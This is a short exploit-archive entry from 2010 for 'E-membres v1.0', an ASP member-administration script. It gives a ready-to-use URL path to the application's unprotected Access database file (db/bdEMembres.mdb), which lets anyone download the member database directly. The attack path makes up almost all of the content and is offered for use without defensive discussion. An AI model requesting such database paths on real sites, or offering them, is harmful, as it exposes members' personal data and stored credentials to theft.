id: 10647
date: 01/10/2010
title: E-membres v1.0 Remote Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

=======================================================
E-membres v1.0 Remote Database Disclosure Vulnerability
=======================================================


 [»] Script:             [ E-membres ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Elle contient la partie d administration des membres ]

###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/db/bdEMembres.mdb
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-27]  #